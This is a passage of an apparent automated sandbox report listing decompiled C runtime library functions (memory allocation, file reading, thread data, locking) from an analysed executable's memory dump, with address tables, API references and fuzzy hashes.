												E00405000(_t93, 0);
												_push( *((intOrPtr*)(_t93 + 0x40)));
												_t74 = E0040C8E5(0,  *((intOrPtr*)(_t93 + 0x40)), _t91, _t93, __eflags) -  *((intOrPtr*)(_t93 + 4));
												__eflags = _t74;
												 *((intOrPtr*)(_t93 + 0x60)) = _t74;
												return _t93;
											} else {
												 *((intOrPtr*)(_t93 + 0x60)) = 0xa;
												return _t93;
											}
										}
									}
								}
							}
							goto L42;
							L7:
							_t62 =  *_t83;
							 *_t88 = _t62;
							_t83 = _t83 + 1;
							_t88 = _t88 + 1;
							if(_t62 != 0) {
								goto L7;
							} else {
								 *((char*)(_t93 + 0x5c)) = 0;
							}
							goto L9;
						}
					}
				}
				L42:
			}

0x004057b7
0x004057bf
0x004057c3
0x004057c5
0x004057cd
0x004059c8
0x004059ce
0x004057db
0x004057e3
0x004057e5
0x004057ea
0x00405921
0x0040592a
0x004057f0
0x004057f3
0x004057f6
0x004057f9
0x004057fc
0x004057ff
0x00405801
0x00405804
0x00405807
0x0040580a
0x0040580d
0x00405810
0x00405813
0x00405816
0x00405819
0x0040581c
0x00405824
0x00405827
0x0040582b
0x0040582e
0x00405831
0x00405834
0x00405837
0x00405837
0x00405839
0x0040583a
0x00405842
0x00405847
0x0040584a
0x0040584f
0x0040591c
0x0040591c
0x00000000
0x00405855
0x00405855
0x00405859
0x0040585b
0x00000000
0x00405870
0x00405872
0x00405874
0x00405874
0x00405877
0x0040587b
0x00405881
0x00405881
0x00405885
0x00405889
0x00405897
0x00405899
0x004058a5
0x004058a7
0x004058b3
0x004058b5
0x004058c1
0x004058c5
0x004058c7
0x004058c7
0x004058c8
0x004058b7
0x004058b7
0x004058b7
0x004058a9
0x004058a9
0x004058a9
0x0040589b
0x0040589b
0x0040589b
0x0040588f
0x00405892
0x00405892
0x004058cc
0x004058cf
0x00000000
0x00000000
0x004058d1
0x004058d9
0x00000000
0x00000000
0x004058db
0x004058db
0x004058e0
0x00000000
0x004058e2
0x004058e4
0x00405930
0x0040593f
0x00405942
0x00405944
0x00405949
0x0040594c
0x0040594e
0x00000000
0x00405950
0x00405950
0x00405953
0x00000000
0x00000000
0x00000000
0x00000000
0x00405953
0x004058e6
0x004058ea
0x004058ec
0x004058f1
0x004058f2
0x004058f4
0x004058f6
0x004058f8
0x004058f9
0x00405904
0x00405906
0x0040590b
0x0040590e
0x00405911
0x00405916
0x00000000
0x00405955
0x00405955
0x00405955
0x00405961
0x00405963
0x00405967
0x0040596d
0x0040596e
0x0040597c
0x0040597d
0x00405970
0x00405970
0x00405974
0x00405975
0x00405975
0x00405985
0x00405988
0x0040598a
0x00000000
0x0040598c
0x0040598c
0x00405990
0x004059a5
0x004059ad
0x004059b6
0x004059b6
0x004059b9
0x004059c5
0x00405992
0x00405992
0x004059a2
0x004059a2
0x00405990
0x0040598a
0x00405916
0x004058e4
0x00000000
0x00405860
0x00405860
0x00405862
0x00405864
0x00405865
0x00405868
0x00000000
0x0040586a
0x0040586a
0x0040586d
0x00000000
0x00405868
0x0040584f
0x004057ea
0x00000000

APIs

_malloc.LIBCMT ref: 004057DE

Part of subcall function 0040B84D: __FF_MSGBANNER.LIBCMT ref: 0040B870
Part of subcall function 0040B84D: __NMSG_WRITE.LIBCMT ref: 0040B877
Part of subcall function 0040B84D: RtlAllocateHeap.NTDLL(00000000,-0000000E,00000001,00000000,00000000,?,00411C86,00000001,00000001,00000001,?,0040D66A,00000018,00421240,0000000C,0040D6FB), ref: 0040B8C4

_malloc.LIBCMT ref: 00405842
_malloc.LIBCMT ref: 00405906
_malloc.LIBCMT ref: 00405930

Strings

1.2.3, xrefs: 004058EC, 00405937

Memory Dump Source

Source File: 00000005.00000002.306344937.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.306344937.0000000000426000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.306344937.000000000042F000.00000040.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_h99af07.jbxd

Yara matches

Similarity

API ID: _malloc$AllocateHeap
String ID: 1.2.3
API String ID: 680241177-2310465506
Opcode ID: dcd0ffeba55ff02fe10acfaeba0fa9d55be123b2b31187241ea46178cf7d6550
Instruction ID: 6f54ea0e5a0cddcbb7a6eab5c61130b8c10e9e343dc86a4c4a61a5a67c51a18e
Opcode Fuzzy Hash: dcd0ffeba55ff02fe10acfaeba0fa9d55be123b2b31187241ea46178cf7d6550
Instruction Fuzzy Hash: 8B61F7B1944B408FD720AF2A888066BBBE0FB45314F548D3FE5D5A3781D739D8498F5A

Uniqueness

Uniqueness Score: -1.00%

Function 0040BCC2 Relevance: 10.7, APIs: 7, Instructions: 189
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 85%

			E0040BCC2(signed int __edx, char* _a4, signed int _a8, signed int _a12, signed int _a16, signed int _a20) {
				signed int _v8;
				char* _v12;
				signed int _v16;
				signed int _v20;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t90;
				intOrPtr* _t92;
				signed int _t94;
				char _t97;
				signed int _t105;
				void* _t106;
				signed int _t107;
				signed int _t110;
				signed int _t113;
				intOrPtr* _t114;
				signed int _t118;
				signed int _t119;
				signed int _t120;
				char* _t121;
				signed int _t125;
				signed int _t131;
				signed int _t133;
				void* _t134;

				_t125 = __edx;
				_t121 = _a4;
				_t119 = _a8;
				_t131 = 0;
				_v12 = _t121;
				_v8 = _t119;
				if(_a12 == 0 || _a16 == 0) {
					L5:
					return 0;
				} else {
					_t138 = _t121;
					if(_t121 != 0) {
						_t133 = _a20;
						__eflags = _t133;
						if(_t133 == 0) {
							L9:
							__eflags = _t119 - 0xffffffff;
							if(_t119 != 0xffffffff) {
								_t90 = E0040BA30(_t131, _t121, _t131, _t119);
								_t134 = _t134 + 0xc;
							}
							__eflags = _t133 - _t131;
							if(__eflags == 0) {
								goto L3;
							} else {
								_t94 = _t90 | 0xffffffff;
								_t125 = _t94 % _a12;
								__eflags = _a16 - _t94 / _a12;
								if(__eflags > 0) {
									goto L3;
								}
								L13:
								_t131 = _a12 * _a16;
								__eflags =  *(_t133 + 0xc) & 0x0000010c;
								_v20 = _t131;
								_t120 = _t131;
								if(( *(_t133 + 0xc) & 0x0000010c) == 0) {
									_v16 = 0x1000;
								} else {
									_v16 =  *((intOrPtr*)(_t133 + 0x18));
								}
								__eflags = _t131;
								if(_t131 == 0) {
									L40:
									return _a16;
								} else {
									do {
										__eflags =  *(_t133 + 0xc) & 0x0000010c;
										if(( *(_t133 + 0xc) & 0x0000010c) == 0) {
											L24:
											__eflags = _t120 - _v16;
											if(_t120 < _v16) {
												_t97 = E0040FC07(_t120, _t125, _t133);
												__eflags = _t97 - 0xffffffff;
												if(_t97 == 0xffffffff) {
													L48:
													return (_t131 - _t120) / _a12;
												}
												__eflags = _v8;
												if(_v8 == 0) {
													L44:
													__eflags = _a8 - 0xffffffff;
													if(__eflags != 0) {
														E0040BA30(_t131, _a4, 0, _a8);
														_t134 = _t134 + 0xc;
													}
													 *((intOrPtr*)(E0040BFC1(__eflags))) = 0x22;
													_push(0);
													_push(0);
													_push(0);
													_push(0);
													_push(0);
													L4:
													E0040E744(_t125, _t131, _t133);
													goto L5;
												}
												_t123 = _v12;
												_v12 = _v12 + 1;
												 *_v12 = _t97;
												_t120 = _t120 - 1;
												_t70 =  &_v8;
												 *_t70 = _v8 - 1;
												__eflags =  *_t70;
												_v16 =  *((intOrPtr*)(_t133 + 0x18));
												goto L39;
											}
											__eflags = _v16;
											if(_v16 == 0) {
												_t105 = 0x7fffffff;
												__eflags = _t120 - 0x7fffffff;
												if(_t120 <= 0x7fffffff) {
													_t105 = _t120;
												}
											} else {
												__eflags = _t120 - 0x7fffffff;
												if(_t120 <= 0x7fffffff) {
													_t55 = _t120 % _v16;
													__eflags = _t55;
													_t125 = _t55;
													_t110 = _t120;
												} else {
													_t125 = 0x7fffffff % _v16;
													_t110 = 0x7fffffff;
												}
												_t105 = _t110 - _t125;
											}
											__eflags = _t105 - _v8;
											if(_t105 > _v8) {
												goto L44;
											} else {
												_push(_t105);
												_push(_v12);
												_t106 = E0040FA20(_t125, _t131, _t133);
												_pop(_t123);
												_push(_t106);
												_t107 = E004102F4(_t120, _t125, _t131, _t133, __eflags);
												_t134 = _t134 + 0xc;
												__eflags = _t107;
												if(_t107 == 0) {
													 *(_t133 + 0xc) =  *(_t133 + 0xc) | 0x00000010;
													goto L48;
												}
												__eflags = _t107 - 0xffffffff;
												if(_t107 == 0xffffffff) {
													L47:
													_t80 = _t133 + 0xc;
													 *_t80 =  *(_t133 + 0xc) | 0x00000020;
													__eflags =  *_t80;
													goto L48;
												}
												_v12 = _v12 + _t107;
												_t120 = _t120 - _t107;
												_v8 = _v8 - _t107;
												goto L39;
											}
										}
										_t113 =  *(_t133 + 4);
										__eflags = _t113;
										if(__eflags == 0) {
											goto L24;
										}
										if(__eflags < 0) {
											goto L47;
										}
										_t131 = _t120;
										__eflags = _t120 - _t113;
										if(_t120 >= _t113) {
											_t131 = _t113;
										}
										__eflags = _t131 - _v8;
										if(_t131 > _v8) {
											_t133 = 0;
											__eflags = _a8 - 0xffffffff;
											if(__eflags != 0) {
												E0040BA30(_t131, _a4, 0, _a8);
												_t134 = _t134 + 0xc;
											}
											_t114 = E0040BFC1(__eflags);
											_push(_t133);
											_push(_t133);
											_push(_t133);
											_push(_t133);
											 *_t114 = 0x22;
											_push(_t133);
											goto L4;
										} else {
											E004103F1(_t120, _t123, _t125, _v12, _v8,  *_t133, _t131);
											 *(_t133 + 4) =  *(_t133 + 4) - _t131;
											 *_t133 =  *_t133 + _t131;
											_v12 = _v12 + _t131;
											_t120 = _t120 - _t131;
											_t134 = _t134 + 0x10;
											_v8 = _v8 - _t131;
											_t131 = _v20;
										}
										L39:
										__eflags = _t120;
									} while (_t120 != 0);
									goto L40;
								}
							}
						}
						_t118 = _t90 | 0xffffffff;
						_t90 = _t118 / _a12;
						_t125 = _t118 % _a12;
						__eflags = _a16 - _t90;
						if(_a16 <= _t90) {
							goto L13;
						}
						goto L9;
					}
					L3:
					_t92 = E0040BFC1(_t138);
					_push(_t131);
					_push(_t131);
					_push(_t131);
					_push(_t131);
					 *_t92 = 0x16;
					_push(_t131);
					goto L4;
				}
			}

0x0040bcc2
0x0040bcca
0x0040bcce
0x0040bcd3
0x0040bcd5
0x0040bcd8
0x0040bcde
0x0040bd01
0x00000000
0x0040bce5
0x0040bce5
0x0040bce7
0x0040bd08
0x0040bd0b
0x0040bd0d
0x0040bd1c
0x0040bd1c
0x0040bd1f
0x0040bd24
0x0040bd29
0x0040bd29
0x0040bd2c
0x0040bd2e
0x00000000
0x0040bd30
0x0040bd30
0x0040bd35
0x0040bd38
0x0040bd3b
0x00000000
0x00000000
0x0040bd3d
0x0040bd40
0x0040bd44
0x0040bd4b
0x0040bd4e
0x0040bd50
0x0040bd5a
0x0040bd52
0x0040bd55
0x0040bd55
0x0040bd61
0x0040bd63
0x0040be53
0x00000000
0x0040bd69
0x0040bd69
0x0040bd69
0x0040bd70
0x0040bdb6
0x0040bdb6
0x0040bdb9
0x0040be24
0x0040be2a
0x0040be2d
0x0040beb8
0x00000000
0x0040bebe
0x0040be33
0x0040be37
0x0040be87
0x0040be87
0x0040be8b
0x0040be95
0x0040be9a
0x0040be9a
0x0040bea2
0x0040beaa
0x0040beab
0x0040beac
0x0040bead
0x0040beae
0x0040bcf9
0x0040bcf9
0x00000000
0x0040bcfe
0x0040be39
0x0040be3c
0x0040be3f
0x0040be44
0x0040be45
0x0040be45
0x0040be45
0x0040be48
0x00000000
0x0040be48
0x0040bdbb
0x0040bdbf
0x0040bde0
0x0040bde5
0x0040bde7
0x0040bde9
0x0040bde9
0x0040bdc1
0x0040bdc8
0x0040bdca
0x0040bdd7
0x0040bdd7
0x0040bdd7
0x0040bdda
0x0040bdcc
0x0040bdce
0x0040bdd1
0x0040bdd1
0x0040bddc
0x0040bddc
0x0040bdeb
0x0040bdee
0x00000000
0x0040bdf4
0x0040bdf4
0x0040bdf5
0x0040bdf9
0x0040bdfe
0x0040bdff
0x0040be00
0x0040be05
0x0040be08
0x0040be0a
0x0040bec6
0x00000000
0x0040bec6
0x0040be10
0x0040be13
0x0040beb4
0x0040beb4
0x0040beb4
0x0040beb4
0x00000000
0x0040beb4
0x0040be19
0x0040be1c
0x0040be1e
0x00000000
0x0040be1e
0x0040bdee
0x0040bd72
0x0040bd75
0x0040bd77
0x00000000
0x00000000
0x0040bd79
0x00000000
0x00000000
0x0040bd7f
0x0040bd81
0x0040bd83
0x0040bd85
0x0040bd85
0x0040bd87
0x0040bd8a
0x0040be5b
0x0040be5d
0x0040be61
0x0040be6a
0x0040be6f
0x0040be6f
0x0040be72
0x0040be77
0x0040be78
0x0040be79
0x0040be7a
0x0040be7b
0x0040be81
0x00000000
0x0040bd90
0x0040bd99
0x0040bd9e
0x0040bda1
0x0040bda3
0x0040bda6
0x0040bda8
0x0040bdab
0x0040bdae
0x0040bdae
0x0040be4b
0x0040be4b
0x0040be4b
0x00000000
0x0040bd69
0x0040bd63
0x0040bd2e
0x0040bd0f
0x0040bd14
0x0040bd14
0x0040bd17
0x0040bd1a
0x00000000
0x00000000
0x00000000
0x0040bd1a
0x0040bce9
0x0040bce9
0x0040bcee
0x0040bcef
0x0040bcf0
0x0040bcf1
0x0040bcf2
0x0040bcf8
0x00000000
0x0040bcf8

APIs

_memset.LIBCMT ref: 0040BD24
_memcpy_s.LIBCMT ref: 0040BD99
__fileno.LIBCMT ref: 0040BDF9
__read.LIBCMT ref: 0040BE00
__filbuf.LIBCMT ref: 0040BE24
_memset.LIBCMT ref: 0040BE6A
_memset.LIBCMT ref: 0040BE95

Part of subcall function 0040BFC1: __getptd_noexit.LIBCMT ref: 0040BFC1

Memory Dump Source

Source File: 00000005.00000002.306344937.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.306344937.0000000000426000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.306344937.000000000042F000.00000040.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_h99af07.jbxd

Yara matches

Similarity

API ID: _memset$__filbuf__fileno__getptd_noexit__read_memcpy_s
String ID:
API String ID: 3886058894-0
Opcode ID: c8cdba87b669e5a45588b0eb276f39e335abb1b1e80ab099951c299220f7b7ba
Instruction ID: 0234425abcb0213f77efd30778ac7634d7a408156a07f93f58cd91f86a00e979
Opcode Fuzzy Hash: c8cdba87b669e5a45588b0eb276f39e335abb1b1e80ab099951c299220f7b7ba
Instruction Fuzzy Hash: 1E519031A00605ABCB209F69C844A9FBB75EF41324F24863BF825B22D1D7799E51CBDD

Uniqueness

Uniqueness Score: -1.00%

Function 00414738 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 31
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 90%

			E00414738(void* __ebx, void* __edx, intOrPtr __edi, void* __esi, void* __eflags) {
				signed int _t13;
				intOrPtr _t28;
				void* _t29;
				void* _t30;

				_t30 = __eflags;
				_t26 = __edi;
				_t25 = __edx;
				_t22 = __ebx;
				_push(0xc);
				_push(0x4214d0);
				E0040E1D8(__ebx, __edi, __esi);
				_t28 = E00410735(__ebx, __edx, __edi, _t30);
				_t13 =  *0x422e34; // 0xfffffffe
				if(( *(_t28 + 0x70) & _t13) == 0) {
					L6:
					E0040D6E0(_t22, 0xc);
					 *(_t29 - 4) =  *(_t29 - 4) & 0x00000000;
					_t8 = _t28 + 0x6c; // 0x6c
					_t26 =  *0x422f18; // 0x422e40
					 *((intOrPtr*)(_t29 - 0x1c)) = E004146FA(_t8, _t26);
					 *(_t29 - 4) = 0xfffffffe;
					E004147A2();
				} else {
					_t32 =  *((intOrPtr*)(_t28 + 0x6c));
					if( *((intOrPtr*)(_t28 + 0x6c)) == 0) {
						goto L6;
					} else {
						_t28 =  *((intOrPtr*)(E00410735(_t22, __edx, _t26, _t32) + 0x6c));
					}
				}
				if(_t28 == 0) {
					E0040E79A(_t25, _t26, 0x20);
				}
				return E0040E21D(_t28);
			}

0x00414738
0x00414738
0x00414738
0x00414738
0x00414738
0x0041473a
0x0041473f
0x00414749
0x0041474b
0x00414753
0x00414777
0x00414779
0x0041477f
0x00414783
0x00414786
0x00414791
0x00414794
0x0041479b
0x00414755
0x00414755
0x00414759
0x00000000
0x0041475b
0x00414760
0x00414760
0x00414759
0x00414765
0x00414769
0x0041476e
0x00414776

APIs

__getptd.LIBCMT ref: 00414744

Part of subcall function 00410735: __getptd_noexit.LIBCMT ref: 00410738
Part of subcall function 00410735: __amsg_exit.LIBCMT ref: 00410745

__getptd.LIBCMT ref: 0041475B
__amsg_exit.LIBCMT ref: 00414769
__lock.LIBCMT ref: 00414779

Strings

@.B, xrefs: 00414786

Memory Dump Source

Source File: 00000005.00000002.306344937.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.306344937.0000000000426000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.306344937.000000000042F000.00000040.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_h99af07.jbxd

Yara matches

Similarity

API ID: __amsg_exit__getptd$__getptd_noexit__lock
String ID: @.B
API String ID: 3521780317-470711618
Opcode ID: f43c5434038c0e2b3130a40ea1e7b9b854db78837d0c16722a3a572f716d4dbb
Instruction ID: 91aff3cf2d6bbea4e2ea5d49e8e08bf0f41c3eb50374f8394f27d7b6c467aa53
Opcode Fuzzy Hash: f43c5434038c0e2b3130a40ea1e7b9b854db78837d0c16722a3a572f716d4dbb
Instruction Fuzzy Hash: 60F09631A407009BE720BB66850678D73A06F81719F91456FE4646B2D1CB7C6981CA5D

Uniqueness

Uniqueness Score: -1.00%

Function 0040C73D Relevance: 7.6, APIs: 5, Instructions: 64
COMMON

Download Yara Rule

C-Code - Quality: 77%

			E0040C73D(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4) {
				intOrPtr _v8;
				void* _t16;
				void* _t17;
				intOrPtr _t19;
				void* _t21;
				signed int _t22;
				intOrPtr* _t27;
				intOrPtr _t39;
				intOrPtr _t40;
				intOrPtr _t50;

				_t37 = __edx;
				_push(8);
				_push(0x421140);
				E0040E1D8(__ebx, __edi, __esi);
				_t39 = _a4;
				_t50 = _t39;
				_t51 = _t50 != 0;
				if(_t50 != 0) {
					E0040FB29(_t39);
					_v8 = 0;
					 *(_t39 + 0xc) =  *(_t39 + 0xc) & 0xffffffcf;
					_t16 = E0040FA20(__edx, _t39, _t39);
					__eflags = _t16 - 0xffffffff;
					if(_t16 == 0xffffffff) {
						L6:
						_t17 = 0x4227e0;
					} else {
						_t21 = E0040FA20(__edx, _t39, _t39);
						__eflags = _t21 - 0xfffffffe;
						if(_t21 == 0xfffffffe) {
							goto L6;
						} else {
							_t22 = E0040FA20(__edx, _t39, _t39);
							_t17 = ((E0040FA20(_t37, _t39, _t39) & 0x0000001f) << 6) +  *((intOrPtr*)(0x423f60 + (_t22 >> 5) * 4));
						}
					}
					_t9 = _t17 + 4; // 0xa80
					 *(_t17 + 4) =  *_t9 & 0x000000fd;
					_v8 = 0xfffffffe;
					E0040C735(_t39);
					_t19 = 0;
					__eflags = 0;
				} else {
					_t27 = E0040BFC1(_t51);
					_t40 = 0x16;
					 *_t27 = _t40;
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					E0040E744(__edx, _t40, 0);
					_t19 = _t40;
				}
				return E0040E21D(_t19);
			}

0x0040c73d
0x0040c690
0x0040c692
0x0040c697
0x0040c69e
0x0040c6a3
0x0040c6a8
0x0040c6aa
0x0040c6c8
0x0040c6ce
0x0040c6d1
0x0040c6d6
0x0040c6dc
0x0040c6df
0x0040c70f
0x0040c70f
0x0040c6e1
0x0040c6e2
0x0040c6e8
0x0040c6eb
0x00000000
0x0040c6ed
0x0040c6ee
0x0040c70b
0x0040c70b
0x0040c6eb
0x0040c714
0x0040c71b
0x0040c71e
0x0040c725
0x0040c72a
0x0040c72a
0x0040c6ac
0x0040c6ac
0x0040c6b3
0x0040c6b4
0x0040c6b6
0x0040c6b7
0x0040c6b8
0x0040c6b9
0x0040c6ba
0x0040c6bb
0x0040c6c3
0x0040c6c3
0x0040c731

APIs

__lock_file.LIBCMT ref: 0040C6C8
__fileno.LIBCMT ref: 0040C6D6
__fileno.LIBCMT ref: 0040C6E2
__fileno.LIBCMT ref: 0040C6EE
__fileno.LIBCMT ref: 0040C6FE

Part of subcall function 0040BFC1: __getptd_noexit.LIBCMT ref: 0040BFC1

Part of subcall function 0040E744: __decode_pointer.LIBCMT ref: 0040E74F

Memory Dump Source

Source File: 00000005.00000002.306344937.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.306344937.0000000000426000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.306344937.000000000042F000.00000040.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_h99af07.jbxd

Yara matches

Similarity

API ID: __fileno$__decode_pointer__getptd_noexit__lock_file
String ID:
API String ID: 2805327698-0
Opcode ID: 2b0b2601706cdb465d4c9eff24f73974ea9fb0f2dbbf8fc2cbf9e4943b65d960
Instruction ID: db056c5abb1484b678344f3d998e50672bc49cccd6cfe868de5707b4f3f6250f
Opcode Fuzzy Hash: 2b0b2601706cdb465d4c9eff24f73974ea9fb0f2dbbf8fc2cbf9e4943b65d960
Instruction Fuzzy Hash: 1A01253231451096C261ABBE5CC246E76A0DE81734726877FF024BB1D2DB3C99429E9D

Uniqueness

Uniqueness Score: -1.00%

Function 00413FCC Relevance: 7.5, APIs: 5, Instructions: 47
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 89%

			E00413FCC(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				signed int _t15;
				LONG* _t21;
				long _t23;
				void* _t31;
				LONG* _t33;
				void* _t34;
				void* _t35;

				_t35 = __eflags;
				_t29 = __edx;
				_t25 = __ebx;
				_push(0xc);
				_push(0x421490);
				E0040E1D8(__ebx, __edi, __esi);
				_t31 = E00410735(__ebx, __edx, __edi, _t35);
				_t15 =  *0x422e34; // 0xfffffffe
				if(( *(_t31 + 0x70) & _t15) == 0 ||  *((intOrPtr*)(_t31 + 0x6c)) == 0) {
					E0040D6E0(_t25, 0xd);
					 *(_t34 - 4) =  *(_t34 - 4) & 0x00000000;
					_t33 =  *(_t31 + 0x68);
					 *(_t34 - 0x1c) = _t33;
					__eflags = _t33 -  *0x422d38; // 0x2c31658
					if(__eflags != 0) {
						__eflags = _t33;
						if(_t33 != 0) {
							_t23 = InterlockedDecrement(_t33);
							__eflags = _t23;
							if(_t23 == 0) {
								__eflags = _t33 - 0x422910;
								if(__eflags != 0) {
									_push(_t33);
									E0040B6B5(_t25, _t31, _t33, __eflags);
								}
							}
						}
						_t21 =  *0x422d38; // 0x2c31658
						 *(_t31 + 0x68) = _t21;
						_t33 =  *0x422d38; // 0x2c31658
						 *(_t34 - 0x1c) = _t33;
						InterlockedIncrement(_t33);
					}
					 *(_t34 - 4) = 0xfffffffe;
					E00414067();
				} else {
					_t33 =  *(_t31 + 0x68);
				}
				if(_t33 == 0) {
					E0040E79A(_t29, _t31, 0x20);
				}
				return E0040E21D(_t33);
			}

0x00413fcc
0x00413fcc
0x00413fcc
0x00413fcc
0x00413fce
0x00413fd3
0x00413fdd
0x00413fdf
0x00413fe7
0x00414008
0x0041400e
0x00414012
0x00414015
0x00414018
0x0041401e
0x00414020
0x00414022
0x00414025
0x0041402b
0x0041402d
0x0041402f
0x00414035
0x00414037
0x00414038
0x0041403d
0x00414035
0x0041402d
0x0041403e
0x00414043
0x00414046
0x0041404c
0x00414050
0x00414050
0x00414056
0x0041405d
0x00413fef
0x00413fef
0x00413fef
0x00413ff4
0x00413ff8
0x00413ffd
0x00414005

APIs

__getptd.LIBCMT ref: 00413FD8

Part of subcall function 00410735: __getptd_noexit.LIBCMT ref: 00410738
Part of subcall function 00410735: __amsg_exit.LIBCMT ref: 00410745

__amsg_exit.LIBCMT ref: 00413FF8
__lock.LIBCMT ref: 00414008
InterlockedDecrement.KERNEL32(?), ref: 00414025
InterlockedIncrement.KERNEL32(02C31658), ref: 00414050

Memory Dump Source

Source File: 00000005.00000002.306344937.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.306344937.0000000000426000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.306344937.000000000042F000.00000040.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_h99af07.jbxd

Yara matches

Similarity

API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock
String ID:
API String ID: 4271482742-0
Opcode ID: 75ed1ba79165a940210d4fbe753a496d3ed1b888d754918a7527295a16311c61
Instruction ID: 77fb08d543caf33888dccec20a3998fa005b1348dfeb798e4aa279577202aa48
Opcode Fuzzy Hash: 75ed1ba79165a940210d4fbe753a496d3ed1b888d754918a7527295a16311c61
Instruction Fuzzy Hash: 9301A531A01621ABD724AF67990579E7B60AF48764F50442BE814B72D0C77C6DC2CBDD

Uniqueness

Uniqueness Score: -1.00%

Function 00413610 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 38
libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 65%

			E00413610() {
				signed long long _v12;
				signed int _v20;
				signed long long _v28;
				signed char _t8;

				_t8 = GetModuleHandleA("KERNEL32");
				if(_t8 == 0) {
					L6:
					_v20 =  *0x41fb50;
					_v28 =  *0x41fb48;
					asm("fsubr qword [ebp-0x18]");
					_v12 = _v28 / _v20 * _v20;
					asm("fld1");
					asm("fcomp qword [ebp-0x8]");
					asm("fnstsw ax");
					if((_t8 & 0x00000005) != 0) {
						return 0;
					} else {
						return 1;
					}
				} else {
					__eax = GetProcAddress(__eax, "IsProcessorFeaturePresent");
					if(__eax == 0) {
						goto L6;
					} else {
						_push(0);
						return __eax;
					}
				}
			}

0x00413615
0x0041361d
0x00413634
0x004135e0
0x004135e9
0x004135f5
0x004135f8
0x004135fb
0x004135fd
0x00413600
0x00413605
0x0041360f
0x00413607
0x0041360b
0x0041360b
0x0041361f
0x00413625
0x0041362d
0x00000000
0x0041362f
0x0041362f
0x00413633
0x00413633
0x0041362d

APIs

GetModuleHandleA.KERNEL32(KERNEL32,0040CDF5), ref: 00413615
GetProcAddress.KERNEL32(00000000,IsProcessorFeaturePresent), ref: 00413625

Strings

KERNEL32, xrefs: 00413610
IsProcessorFeaturePresent, xrefs: 0041361F

Memory Dump Source

Source File: 00000005.00000002.306344937.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.306344937.0000000000426000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.306344937.000000000042F000.00000040.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_h99af07.jbxd

Yara matches

Similarity

API ID: AddressHandleModuleProc
String ID: IsProcessorFeaturePresent$KERNEL32
API String ID: 1646373207-3105848591
Opcode ID: 118b5162a474c003ae69c9300a13838c9d8123de4a3b48a289e819fb4020d245
Instruction ID: 3bb3582238f4ecb0ba7b9e8fe578e45fdcf0af3c55e5dfe2a5e3893bc0ad87fb
Opcode Fuzzy Hash: 118b5162a474c003ae69c9300a13838c9d8123de4a3b48a289e819fb4020d245
Instruction Fuzzy Hash: 96F06230600A09E2DB105FA1ED1E2EFBB74BB80746F5101A19196B0194DF38D0B6825A

Uniqueness

Uniqueness Score: -1.00%

Function 0040C748 Relevance: 6.1, APIs: 4, Instructions: 148
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 86%

			E0040C748(void* __edx, void* __esi, char _a4) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				void* __ebx;
				void* __edi;
				void* __ebp;
				signed int _t70;
				signed int _t71;
				intOrPtr _t73;
				signed int _t75;
				signed int _t81;
				char _t82;
				signed int _t84;
				intOrPtr* _t86;
				signed int _t87;
				intOrPtr* _t90;
				signed int _t92;
				signed int _t94;
				void* _t96;
				signed char _t98;
				signed int _t99;
				intOrPtr _t102;
				signed int _t103;
				intOrPtr* _t104;
				signed int _t111;
				signed int _t114;
				intOrPtr _t115;

				_t105 = __esi;
				_t97 = __edx;
				_t104 = _a4;
				_t87 = 0;
				_t121 = _t104;
				if(_t104 != 0) {
					_t70 = E0040FA20(__edx, _t104, _t104);
					__eflags =  *(_t104 + 4);
					_v8 = _t70;
					if(__eflags < 0) {
						 *(_t104 + 4) = 0;
					}
					_push(1);
					_push(_t87);
					_push(_t70);
					_t71 = E00411939(_t87, _t97, _t104, _t105, __eflags);
					__eflags = _t71 - _t87;
					_v12 = _t71;
					if(_t71 < _t87) {
						L2:
						return _t71 | 0xffffffff;
					} else {
						_t98 =  *(_t104 + 0xc);
						__eflags = _t98 & 0x00000108;
						if((_t98 & 0x00000108) != 0) {
							_t73 =  *_t104;
							_t92 =  *(_t104 + 8);
							_push(_t105);
							_v16 = _t73 - _t92;
							__eflags = _t98 & 0x00000003;
							if((_t98 & 0x00000003) == 0) {
								__eflags = _t98;
								if(__eflags < 0) {
									L15:
